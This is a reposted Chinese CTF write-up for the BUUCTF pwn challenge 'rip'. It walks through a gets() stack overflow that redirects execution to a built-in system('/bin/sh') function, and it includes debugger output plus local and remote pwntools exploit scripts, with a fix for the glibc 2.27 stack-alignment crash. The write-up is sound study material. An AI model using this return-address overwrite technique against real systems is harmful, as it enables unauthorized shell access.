BUU PWN RIP1 RET2CODE WRITEUP


1、下載附件后,運行是一個輸入程序,IDA分析main函數,gets可溢出。

F5偽代碼如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+1h] [rbp-Fh]

  puts("please input");
  gets(&s, argv);
  puts(&s);
  puts("ok,bye!!!");
  return 0;
}

2、在附近還有個fun函數,存在shell入口。

int fun()
{
  return system("/bin/sh");
}

3、checksec查看無保護。

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial
4、 解法思路:只要對gets棧溢出,並修改函數ret的指針至fun函數即可。
5、在main函數下斷點,單步執行,在到gets函數之前,記錄棧頂和棧底地址。
rbp:0x7fffffffe7a0
rsp:0x7fffffffe790
參數起始位置:0x7fffffffe791

6、單步執行運行,輸入任意字符,執行完函數。ret位置在0x7fffffffe7a8,也就是需要替換的return address位置。

7、所以這里的offset填充值=ret的位置-第一個參數開始位
0x7fffffffe7a8-0x7fffffffe791
也就是23個字節
手工嘗試填充23*"A",觀察棧填充情況,一直寫覆蓋原棧底值

 

 8、在IDA中找到fun函數的開始位置:0x401186。這個值用來替換棧中原本的內容0x7ffff7e15d0a

 9、寫exp

from pwn import *

r = process('./pwn1')

offset = 0x7fffffffe7a8-0x7fffffffe791
fun = 0x0000000000401186
r.sendline('a'*offset+p64(fun).decode("iso-8859-1"))
r.interactive()

在本地可以執行,但是目標替換為遠端就不行了

10、看到遠端環境是ubuntu18.04,試過本地使用ubuntu18.04也不行。
11、在18.04執行exp后斷點分析,最后停留語句在
movaps XMMWORD PTR [rsp+0x40],xmm0
12、movaps會判斷是否16字節對齊,這里判斷的rsp+0x40指針地址,差8字節對齊。
最后查詢glibc版本2.27的system會有這樣的判斷,可以看到ubuntu18.04中glibc版本

 

在401186位置壓入的rbp,只做堆棧保留,不影響對shell執行。所以這里可以跳過這次壓棧,減掉后面棧中的8字節之差。
所以可以跳過rbp壓棧或棧頂提升,直接在401187和40118A執行都可以
13、所以exp應該是這樣
from pwn import *

  r = remote("X.X.X.X",29395)

offset = 0x7fffffffe7a8-0x7fffffffe791
fun = 0x0000000000401187
r.sendline('a'*offset+p64(fun).decode("iso-8859-1"))
r.interactive()
14、遠端執行成功拿到flag

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM